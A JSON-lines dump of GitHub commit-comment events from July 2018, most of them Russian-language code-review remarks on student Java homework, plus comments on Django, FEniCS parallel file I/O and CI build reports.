{"id":"7967184787","type":"CommitCommentEvent","actor":{"login":"ekhanunimelb"},"repo":{"name":"UoM-ResPlat-DevOps/uom-cloud-dashboard"},"payload":{"comment":{"id":29712349,"position":null,"line":null,"path":null,"commit_id":"02cecbdb6d72bfa2fead41b4e341137cab0f364a","created_at":"2018-07-15T10:57:39Z","updated_at":"2018-07-15T10:57:39Z","author_association":"COLLABORATOR","body":"Later Django versions have a problem with `{% load url from future %}`, which at the moment is called in [_login.html](https://github.com/UoM-ResPlat-DevOps/uom-cloud-dashboard/blob/nectar/queens-develop/theme/templates/auth/_login.html)."}},"created_at":"2018-07-15T10:57:39Z"}
{"id":"7967185068","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712350,"position":6,"line":6,"path":"src/HW2/Homework2Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:57:53Z","updated_at":"2018-07-15T10:57:53Z","author_association":"NONE","body":"одного отступа достаточно между классом и функцией"}},"created_at":"2018-07-15T10:57:53Z"}
{"id":"7967185346","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712351,"position":1,"line":1,"path":"src/HW2/Homework2Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:58:10Z","updated_at":"2018-07-15T10:58:10Z","author_association":"NONE","body":"название пакетов с маленькой буквы, код конвеншен читаем)"}},"created_at":"2018-07-15T10:58:10Z"}
{"id":"7967185558","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712352,"position":20,"line":20,"path":"src/HW2/Homework2Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:58:21Z","updated_at":"2018-07-15T10:58:21Z","author_association":"NONE","body":"название функций с маленькой буквы"}},"created_at":"2018-07-15T10:58:21Z"}
{"id":"7967185606","type":"CommitCommentEvent","actor":{"login":"MarkusTiede"},"repo":{"name":"rajathie/extended-essay"},"payload":{"comment":{"id":29712353,"position":15,"line":17,"path":"main.adoc","commit_id":"c85c257a48c9d9053400186b4e11c5db2e929185","created_at":"2018-07-15T10:58:24Z","updated_at":"2018-07-15T10:58:24Z","author_association":"COLLABORATOR","body":"Possibilities of turing complete languages / state machines transferred to blockchains such as Ethereum."}},"created_at":"2018-07-15T10:58:24Z"}
{"id":"7967185885","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712354,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T10:58:38Z","updated_at":"2018-07-15T10:58:38Z","author_association":"MEMBER","body":"Also note that `boost::filesystem::exists(_filename)` is also problematic. What happens if it evaluated as true on one process and false on other? I believe that reasonable solution might be something akong the lines of\r\n\r\n```\r\nMPI::barrier(_comm);\r\nbool exists = MPI::max(_comm, boost::filesystem::exists(_filename));\r\nif (exists)\r\n{\r\n  pugi::xml_parse_result result = try_open_xml(_filename);\r\n  ...\r\n}\r\nelse\r\n{\r\n  ...\r\n}\r\n```\r\n\r\nThis does two things. 1. synchronizes before checking for existence of file, 2. tries to open the file multiple times with some short delay (maybe 1024 times times 250 ms?) because certain file systems (for example NFS) do not guarantee that the file system looks the same from every node in a  given time."}},"created_at":"2018-07-15T10:58:38Z"}
{"id":"7967186120","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712355,"position":27,"line":27,"path":"src/HW2/Homework2Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:58:51Z","updated_at":"2018-07-15T10:58:51Z","author_association":"NONE","body":"не надо после кейса открывать скобочки {}"}},"created_at":"2018-07-15T10:58:51Z"}
{"id":"7967186383","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712356,"position":56,"line":56,"path":"src/HW2/Homework2Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:59:06Z","updated_at":"2018-07-15T10:59:06Z","author_association":"NONE","body":"не надо делать лишних отступов"}},"created_at":"2018-07-15T10:59:06Z"}
{"id":"7967186644","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712357,"position":96,"line":96,"path":"src/HW2/Homework2Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:59:19Z","updated_at":"2018-07-15T10:59:19Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-15T10:59:19Z"}
{"id":"7967187010","type":"CommitCommentEvent","actor":{"login":"MarkusTiede"},"repo":{"name":"rajathie/extended-essay"},"payload":{"comment":{"id":29712358,"position":26,"line":26,"path":"main.adoc","commit_id":"c85c257a48c9d9053400186b4e11c5db2e929185","created_at":"2018-07-15T10:59:37Z","updated_at":"2018-07-15T10:59:37Z","author_association":"COLLABORATOR","body":"too much focus on the example that will be given"}},"created_at":"2018-07-15T10:59:37Z"}
{"id":"7967187064","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712359,"position":107,"line":107,"path":"src/HW2/Homework2Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:59:39Z","updated_at":"2018-07-15T10:59:39Z","author_association":"NONE","body":"сразу return (year % 4 == 0 && year % 100 != 0) || year % 400 == 0;"}},"created_at":"2018-07-15T10:59:39Z"}
{"id":"7967187269","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712360,"position":5,"line":5,"path":"src/HW2/Homework2Task2.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:59:50Z","updated_at":"2018-07-15T10:59:50Z","author_association":"NONE","body":"\r\nделать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T10:59:50Z"}
{"id":"7967187423","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712361,"position":6,"line":6,"path":"src/HW2/Homework2Task2.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T10:59:57Z","updated_at":"2018-07-15T10:59:57Z","author_association":"NONE","body":"\r\nне надо делать отступ в первой строчке функции"}},"created_at":"2018-07-15T10:59:57Z"}
{"id":"7967187984","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712370,"position":67,"line":67,"path":"src/HW2/Homework2Task2.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:00:19Z","updated_at":"2018-07-15T11:00:19Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T11:00:19Z"}
{"id":"7967188304","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712372,"position":65,"line":65,"path":"src/HW2/Homework2Task2.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:00:34Z","updated_at":"2018-07-15T11:00:34Z","author_association":"NONE","body":"опять куча оступов после класса, не должно их быть!"}},"created_at":"2018-07-15T11:00:34Z"}
{"id":"7967188565","type":"CommitCommentEvent","actor":{"login":"mmojek"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712373,"position":null,"line":null,"path":null,"commit_id":"02b1bce0c8b51934c6af9caa544fcbd32ee4753a","created_at":"2018-07-15T11:00:49Z","updated_at":"2018-07-15T11:00:49Z","author_association":"COLLABORATOR","body":"Kod przejrzysty, drobne poprawki. Super nazewnictwo metod."}},"created_at":"2018-07-15T11:00:49Z"}
{"id":"7967189114","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712377,"position":59,"line":59,"path":"src/HW2/Homework2Task2.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:01:14Z","updated_at":"2018-07-15T11:01:14Z","author_association":"NONE","body":"по условию задачи надо было определить, помещаются ли оба дома на участке одновременно, а не по отдельности, иначе смысл от постановки задачи с двумя домами, если можно было просто один дом проверять много раз?"}},"created_at":"2018-07-15T11:01:14Z"}
{"id":"7967189615","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712379,"position":16,"line":16,"path":"src/HW2/Homework2Task3.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:01:38Z","updated_at":"2018-07-15T11:01:38Z","author_association":"NONE","body":"не лениться давать осмысленные имена переменным, чтобы было понятно, что там лежит"}},"created_at":"2018-07-15T11:01:38Z"}
{"id":"7967190038","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712380,"position":35,"line":35,"path":"src/HW2/Homework2Task3.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:01:58Z","updated_at":"2018-07-15T11:01:58Z","author_association":"NONE","body":"сразу return b * b - 4 * a * c;"}},"created_at":"2018-07-15T11:01:58Z"}
{"id":"7967190237","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712381,"position":45,"line":45,"path":"src/HW2/Homework2Task3.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:02:08Z","updated_at":"2018-07-15T11:02:08Z","author_association":"NONE","body":"return d > 0;"}},"created_at":"2018-07-15T11:02:08Z"}
{"id":"7967190379","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712383,"position":56,"line":56,"path":"src/HW2/Homework2Task3.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:02:15Z","updated_at":"2018-07-15T11:02:15Z","author_association":"NONE","body":"return d == 0;"}},"created_at":"2018-07-15T11:02:15Z"}
{"id":"7967190969","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712384,"position":14,"line":14,"path":"src/HW3/Homework3Task1.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:02:43Z","updated_at":"2018-07-15T11:02:43Z","author_association":"NONE","body":"давать названия функциям тоже осмысленные, как и всему остальному в джаве)"}},"created_at":"2018-07-15T11:02:43Z"}
{"id":"7967191395","type":"CommitCommentEvent","actor":{"login":"kejiewang"},"repo":{"name":"kejiewang/FindJob"},"payload":{"comment":{"id":29712385,"position":null,"line":null,"path":null,"commit_id":"fcd83033070173dfd116f687aaf4269c428c675d","created_at":"2018-07-15T11:03:03Z","updated_at":"2018-07-15T11:03:03Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-15T11:03:03Z"}
{"id":"7967191765","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712386,"position":27,"line":27,"path":"src/HW3/Homework3Task2.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:03:20Z","updated_at":"2018-07-15T11:03:20Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом\r\n"}},"created_at":"2018-07-15T11:03:20Z"}
{"id":"7967192568","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712389,"position":15,"line":15,"path":"src/HW3/Homework3Task3.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:04:00Z","updated_at":"2018-07-15T11:04:00Z","author_association":"NONE","body":"тяжело будет понимать пользователю, что от него хотят, без уведомления в консоли\r\n"}},"created_at":"2018-07-15T11:04:00Z"}
{"id":"7967192790","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29712390,"position":null,"line":null,"path":null,"commit_id":"b2e418c1a1350be5e054f8900d431d10d1cd88aa","created_at":"2018-07-15T11:04:10Z","updated_at":"2018-07-15T11:04:10Z","author_association":"COLLABORATOR","body":"<h3>Added missing text css classnames to Classes module (#2693)</h3>\n\nPreview: <strong><a href='https://18589-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18589-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18589-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-15T11:04:10Z"}
{"id":"7967192851","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712391,"position":null,"line":null,"path":null,"commit_id":"3d9f8454ba627505f373db5b6f6ab1ae283a5187","created_at":"2018-07-15T11:04:12Z","updated_at":"2018-07-15T11:04:12Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2819 of 2980 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 58 tests had: MTR big diffs.\n * 23 tests had: ERR diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 482\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.6%25-yellow.png)</a> \n"}},"created_at":"2018-07-15T11:04:12Z"}
{"id":"7967192961","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712393,"position":48,"line":48,"path":"src/HW3/Homework3Task3.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:04:16Z","updated_at":"2018-07-15T11:04:16Z","author_association":"NONE","body":"чем дальше задачи идут, тем больше пробелов)"}},"created_at":"2018-07-15T11:04:16Z"}
{"id":"7967194339","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29712396,"position":27,"line":27,"path":"src/HW3/Homework3Task2.java","commit_id":"4bccad23b5739640bbfc825a0ce31b64e005d929","created_at":"2018-07-15T11:05:22Z","updated_at":"2018-07-15T11:05:22Z","author_association":"NONE","body":"рекурсивную часть не нашел решения"}},"created_at":"2018-07-15T11:05:22Z"}
{"id":"7967195231","type":"CommitCommentEvent","actor":{"login":"jonaski"},"repo":{"name":"jonaski/strawberry"},"payload":{"comment":{"id":29712397,"position":null,"line":null,"path":null,"commit_id":"70db0a33d144537dad6059ab72dcf6c0503035b7","created_at":"2018-07-15T11:06:05Z","updated_at":"2018-07-15T11:06:05Z","author_association":"OWNER","body":"The deb package files here are mainly for an automatic builds done by buildbot.\r\nThere are deb packages for debian scretch and ubuntu artful and bionic that have been built using the package files in dist/debian. You can try them: http://builds.jkvinge.net/\r\nBut I don't know if they work. i have not tested them myself.\r\nI can't submit packages to debian/ubuntu directly, it needs to through a developer."}},"created_at":"2018-07-15T11:06:05Z"}
{"id":"7967195286","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712398,"position":1,"line":1,"path":"Lesson2/TaskOne.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:06:08Z","updated_at":"2018-07-15T11:06:08Z","author_association":"NONE","body":"названия пакетов с маленькой буквы, читаем код конвеншен"}},"created_at":"2018-07-15T11:06:08Z"}
{"id":"7967195541","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712399,"position":82,"line":82,"path":"Lesson2/TaskOne.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:06:20Z","updated_at":"2018-07-15T11:06:20Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T11:06:20Z"}
{"id":"7967196048","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712401,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T11:06:43Z","updated_at":"2018-07-15T11:06:43Z","author_association":"MEMBER","body":"To demonstrate how DOLFIN IO is really far from practical parallel usability consider dirty tricks one has to do, for examples, here:\r\nhttps://bitbucket.org/pefarrell/defcon/src/master/defcon/branchio.py\r\nhttps://bitbucket.org/pefarrell/defcon/src/master/defcon/iomodule.py"}},"created_at":"2018-07-15T11:06:43Z"}
{"id":"7967196128","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712402,"position":21,"line":21,"path":"Lesson2/TaskOne.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:06:47Z","updated_at":"2018-07-15T11:06:47Z","author_association":"NONE","body":"\r\nкомментарии в коде можно оставлять только перед методом или перед классом, в коде их быть не должно "}},"created_at":"2018-07-15T11:06:47Z"}
{"id":"7967197519","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712405,"position":38,"line":38,"path":"Lesson2/TaskOne.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:07:51Z","updated_at":"2018-07-15T11:07:51Z","author_association":"NONE","body":"сложное решение, можно гораздо проще"}},"created_at":"2018-07-15T11:07:51Z"}
{"id":"7967198382","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712406,"position":45,"line":45,"path":"Lesson2/TaskOne.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:08:33Z","updated_at":"2018-07-15T11:08:33Z","author_association":"NONE","body":"одну строчку оставляет между методами"}},"created_at":"2018-07-15T11:08:33Z"}
{"id":"7967198622","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712407,"position":72,"line":72,"path":"Lesson2/TaskOne.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:08:46Z","updated_at":"2018-07-15T11:08:46Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-15T11:08:46Z"}
{"id":"7967198734","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712409,"position":74,"line":74,"path":"Lesson2/TaskOne.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:08:52Z","updated_at":"2018-07-15T11:08:52Z","author_association":"NONE","body":"\r\nстараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-15T11:08:52Z"}
{"id":"7967198996","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712410,"position":null,"line":null,"path":null,"commit_id":"3d9f8454ba627505f373db5b6f6ab1ae283a5187","created_at":"2018-07-15T11:09:08Z","updated_at":"2018-07-15T11:09:08Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T11:09:08Z"}
{"id":"7967199262","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712411,"position":8,"line":8,"path":"Lesson2/TaskThree.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:09:22Z","updated_at":"2018-07-15T11:09:22Z","author_association":"NONE","body":"в одну строчку объявлять переменные нельзя!"}},"created_at":"2018-07-15T11:09:22Z"}
{"id":"7967199726","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712414,"position":17,"line":17,"path":"Lesson2/TaskThree.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:09:48Z","updated_at":"2018-07-15T11:09:48Z","author_association":"NONE","body":"не надо объявлять переменные так высоко от их первого использования, область видимости должна быть как можно меньше"}},"created_at":"2018-07-15T11:09:48Z"}
{"id":"7967200698","type":"CommitCommentEvent","actor":{"login":"michalhabera"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712415,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T11:10:38Z","updated_at":"2018-07-15T11:10:38Z","author_association":"CONTRIBUTOR","body":"Not sure about `H5Fclose`. But agree with `boost::filesystem::exists(_filename)`. \r\nIt is not important in write mode, where every non-root process creates his own XML structure (pugi xml doc) but that is just thrown away later. It is important in read mode, where xml doc is read if is exists. If root process didn't save XML document and rank1 tries to open it..."}},"created_at":"2018-07-15T11:10:38Z"}
{"id":"7967201092","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712416,"position":48,"line":48,"path":"Lesson2/TaskTwo.java","commit_id":"f853bd6ae18ff6293878eab0e19886d264557a2a","created_at":"2018-07-15T11:11:01Z","updated_at":"2018-07-15T11:11:01Z","author_association":"NONE","body":"по условию задачи надо было проверить, помещаются ли оба дома одновременно, а не по одному в отдельности"}},"created_at":"2018-07-15T11:11:01Z"}
{"id":"7967201978","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712417,"position":4,"line":4,"path":"Lesson3/TaskThree.java","commit_id":"2575072d2f725ac9bc05ed9f3d56d208a9b7dbf3","created_at":"2018-07-15T11:11:49Z","updated_at":"2018-07-15T11:11:49Z","author_association":"NONE","body":"\r\nделать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T11:11:49Z"}
{"id":"7967202150","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712424,"position":3,"line":3,"path":"Lesson3/TaskThree.java","commit_id":"2575072d2f725ac9bc05ed9f3d56d208a9b7dbf3","created_at":"2018-07-15T11:11:58Z","updated_at":"2018-07-15T11:11:58Z","author_association":"NONE","body":"между импортом и классом тоже отступ"}},"created_at":"2018-07-15T11:11:58Z"}
{"id":"7967202266","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712425,"position":1,"line":1,"path":"Lesson3/TaskThree.java","commit_id":"2575072d2f725ac9bc05ed9f3d56d208a9b7dbf3","created_at":"2018-07-15T11:12:05Z","updated_at":"2018-07-15T11:12:05Z","author_association":"NONE","body":"пакет с маленькой"}},"created_at":"2018-07-15T11:12:05Z"}
{"id":"7967202675","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712427,"position":19,"line":19,"path":"Lesson3/TaskThree.java","commit_id":"2575072d2f725ac9bc05ed9f3d56d208a9b7dbf3","created_at":"2018-07-15T11:12:26Z","updated_at":"2018-07-15T11:12:26Z","author_association":"NONE","body":"надо рассчитать среднее лишь один раз, а не на каждой итерации цикла"}},"created_at":"2018-07-15T11:12:26Z"}
{"id":"7967203454","type":"CommitCommentEvent","actor":{"login":"caddepazar"},"repo":{"name":"mgp25/WART"},"payload":{"comment":{"id":29712428,"position":null,"line":null,"path":null,"commit_id":"604c6a32ffe14e04e999d064342551061a01c778","created_at":"2018-07-15T11:13:09Z","updated_at":"2018-07-15T11:13:09Z","author_association":"NONE","body":"604c6a3"}},"created_at":"2018-07-15T11:13:09Z"}
{"id":"7967203517","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712429,"position":15,"line":15,"path":"Lesson3/TaskTwo.java","commit_id":"2575072d2f725ac9bc05ed9f3d56d208a9b7dbf3","created_at":"2018-07-15T11:13:11Z","updated_at":"2018-07-15T11:13:11Z","author_association":"NONE","body":"лучше while бы подошел"}},"created_at":"2018-07-15T11:13:11Z"}
{"id":"7967203739","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29712430,"position":23,"line":23,"path":"Lesson3/TaskTwo.java","commit_id":"2575072d2f725ac9bc05ed9f3d56d208a9b7dbf3","created_at":"2018-07-15T11:13:23Z","updated_at":"2018-07-15T11:13:23Z","author_association":"NONE","body":"рекурсивного решения задачи не нашел я\r\n"}},"created_at":"2018-07-15T11:13:23Z"}
{"id":"7967204326","type":"CommitCommentEvent","actor":{"login":"MarkFicht"},"repo":{"name":"MarkFicht/Workshop1-onepage-website"},"payload":{"comment":{"id":29712432,"position":null,"line":null,"path":null,"commit_id":"30246fc0c507ef275a5f2d07aec03727b4aa3646","created_at":"2018-07-15T11:13:54Z","updated_at":"2018-07-15T11:13:54Z","author_association":"OWNER","body":"Solving the problem with specificity :) - used id."}},"created_at":"2018-07-15T11:13:54Z"}
{"id":"7967205016","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712435,"position":9,"line":9,"path":"src/lesson2SecondAttempt/Task1.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:14:26Z","updated_at":"2018-07-15T11:14:26Z","author_association":"NONE","body":"не надо использовать для решения задач материал, который мы еще не прошли, тем более что не корректно используешь"}},"created_at":"2018-07-15T11:14:26Z"}
{"id":"7967205458","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712436,"position":7,"line":7,"path":"src/lesson2SecondAttempt/Task1.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:14:48Z","updated_at":"2018-07-15T11:14:48Z","author_association":"NONE","body":"\r\nделать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T11:14:48Z"}
{"id":"7967205768","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712438,"position":1,"line":1,"path":"src/lesson2SecondAttempt/Task1.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:15:04Z","updated_at":"2018-07-15T11:15:04Z","author_association":"NONE","body":"названия пакетов не должно быть в camel case, читаем код конвеншен"}},"created_at":"2018-07-15T11:15:04Z"}
{"id":"7967207022","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29712441,"position":42,"line":42,"path":"src/lesson2SecondAttempt/Task1.java","commit_id":"1d4385b191d28712d8727ede293fe2cc043f07be","created_at":"2018-07-15T11:16:06Z","updated_at":"2018-07-15T11:16:06Z","author_association":"NONE","body":"лучше выносить в функции, тем более мы ее писали, чтобы код читался лучше"}},"created_at":"2018-07-15T11:16:06Z"}
